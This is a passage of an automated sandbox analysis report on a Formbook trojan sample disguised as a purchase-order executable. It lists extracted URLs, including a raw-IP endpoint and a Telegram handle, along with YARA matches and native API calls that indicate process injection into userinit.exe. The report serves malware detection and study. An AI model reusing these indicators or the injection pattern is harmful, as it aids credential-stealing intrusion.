            Source: userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.98:58888/
            Source: PO23100072.exe, 00000000.00000002.1480577595.0000000002B55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: FrMKpuEiehQ.exe, 0000000A.00000002.3909668348.00000000054F5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app
            Source: FrMKpuEiehQ.exe, 0000000A.00000002.3909668348.00000000054F5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app/we8s/
            Source: userinit.exe, 00000009.00000002.3907399818.000000000498E000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003C2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: userinit.exe, 00000009.00000002.3907399818.000000000548C000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.000000000472C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: userinit.exe, 00000009.00000003.1904708473.0000000007F8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/AG09999
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004CB2000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000009.00000002.3907399818.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003778000.00000004.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003F52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0042C283 NtClose,5_2_0042C283
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2B60 NtClose,LdrInitializeThunk,5_2_017E2B60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_017E2DF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_017E2C70
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E35C0 NtCreateMutant,LdrInitializeThunk,5_2_017E35C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E4340 NtSetContextThread,5_2_017E4340
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E4650 NtSuspendThread,5_2_017E4650
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BF0 NtAllocateVirtualMemory,5_2_017E2BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BE0 NtQueryValueKey,5_2_017E2BE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BA0 NtEnumerateValueKey,5_2_017E2BA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2B80 NtQueryInformationFile,5_2_017E2B80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AF0 NtWriteFile,5_2_017E2AF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AD0 NtReadFile,5_2_017E2AD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AB0 NtWaitForSingleObject,5_2_017E2AB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D30 NtUnmapViewOfSection,5_2_017E2D30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D10 NtMapViewOfSection,5_2_017E2D10
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D00 NtSetInformationFile,5_2_017E2D00
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DD0 NtDelayExecution,5_2_017E2DD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DB0 NtEnumerateKey,5_2_017E2DB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C60 NtCreateKey,5_2_017E2C60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C00 NtQueryInformationProcess,5_2_017E2C00
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2CF0 NtOpenProcess,5_2_017E2CF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2CC0 NtQueryVirtualMemory,5_2_017E2CC0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2CA0 NtQueryInformationToken, 5_2_017E2CA0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2F60 NtCreateProcessEx, 5_2_017E2F60
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2F30 NtCreateSection, 5_2_017E2F30
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2FE0 NtCreateFile, 5_2_017E2FE0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2FB0 NtResumeThread, 5_2_017E2FB0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2FA0 NtQuerySection, 5_2_017E2FA0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2F90 NtProtectVirtualMemory, 5_2_017E2F90
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2E30 NtWriteVirtualMemory, 5_2_017E2E30
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2EE0 NtQueueApcThread, 5_2_017E2EE0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2EA0 NtAdjustPrivilegesToken, 5_2_017E2EA0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E2E80 NtReadVirtualMemory, 5_2_017E2E80
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E3010 NtOpenDirectoryObject, 5_2_017E3010
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E3090 NtSetValueKey, 5_2_017E3090
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E39B0 NtGetContextThread, 5_2_017E39B0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E3D70 NtOpenThread, 5_2_017E3D70
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E3D10 NtOpenProcessToken, 5_2_017E3D10
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03774340 NtSetContextThread, LdrInitializeThunk, 9_2_03774340
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03774650 NtSuspendThread, LdrInitializeThunk, 9_2_03774650
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772B60 NtClose, LdrInitializeThunk, 9_2_03772B60
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 9_2_03772BF0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772BE0 NtQueryValueKey, LdrInitializeThunk, 9_2_03772BE0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772BA0 NtEnumerateValueKey, LdrInitializeThunk, 9_2_03772BA0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772AF0 NtWriteFile, LdrInitializeThunk, 9_2_03772AF0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772AD0 NtReadFile, LdrInitializeThunk, 9_2_03772AD0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772F30 NtCreateSection, LdrInitializeThunk, 9_2_03772F30
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772FE0 NtCreateFile, LdrInitializeThunk, 9_2_03772FE0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772FB0 NtResumeThread, LdrInitializeThunk, 9_2_03772FB0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772EE0 NtQueueApcThread, LdrInitializeThunk, 9_2_03772EE0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772E80 NtReadVirtualMemory, LdrInitializeThunk, 9_2_03772E80
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772D30 NtUnmapViewOfSection, LdrInitializeThunk, 9_2_03772D30
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772D10 NtMapViewOfSection, LdrInitializeThunk, 9_2_03772D10
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772DF0 NtQuerySystemInformation, LdrInitializeThunk, 9_2_03772DF0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772DD0 NtDelayExecution, LdrInitializeThunk, 9_2_03772DD0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772C70 NtFreeVirtualMemory, LdrInitializeThunk, 9_2_03772C70
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772C60 NtCreateKey, LdrInitializeThunk, 9_2_03772C60
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772CA0 NtQueryInformationToken, LdrInitializeThunk, 9_2_03772CA0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_037735C0 NtCreateMutant, LdrInitializeThunk, 9_2_037735C0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_037739B0 NtGetContextThread, LdrInitializeThunk, 9_2_037739B0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772B80 NtQueryInformationFile, 9_2_03772B80
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772AB0 NtWaitForSingleObject, 9_2_03772AB0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772F60 NtCreateProcessEx, 9_2_03772F60
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772FA0 NtQuerySection, 9_2_03772FA0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772F90 NtProtectVirtualMemory, 9_2_03772F90
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772E30 NtWriteVirtualMemory, 9_2_03772E30
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772EA0 NtAdjustPrivilegesToken, 9_2_03772EA0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772D00 NtSetInformationFile, 9_2_03772D00
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772DB0 NtEnumerateKey, 9_2_03772DB0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772C00 NtQueryInformationProcess, 9_2_03772C00
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772CF0 NtOpenProcess, 9_2_03772CF0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03772CC0 NtQueryVirtualMemory, 9_2_03772CC0
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03773010 NtOpenDirectoryObject, 9_2_03773010
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03773090 NtSetValueKey, 9_2_03773090
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03773D70 NtOpenThread, 9_2_03773D70
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03773D10 NtOpenProcessToken, 9_2_03773D10
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03028F00 NtReadFile, 9_2_03028F00
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03028D90 NtCreateFile, 9_2_03028D90
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03029210 NtAllocateVirtualMemory, 9_2_03029210
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_03029000 NtDeleteFile, 9_2_03029000
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_030290B0 NtClose, 9_2_030290B0
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: String function: 0179B970 appears 280 times
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: String function: 0182F290 appears 105 times
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: String function: 017F7E54 appears 102 times
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: String function: 0181EA12 appears 86 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 03787E54 appears 111 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 0372B970 appears 280 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 037AEA12 appears 86 times
            Source: PO23100072.exe, 00000000.00000002.1495354166.0000000007720000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1482712855.0000000003D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1494943777.0000000006D02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1478098149.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660702317.00000000014EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660923291.000000000189D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO23100072.exe
            Source: PO23100072.exe Binary or memory string: OriginalFilenameZlbU.exe8 vs PO23100072.exe
            Source: PO23100072.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: PO23100072.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, cEpaBxiqWvHD9jf5MO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: _0020.AddAccessRule
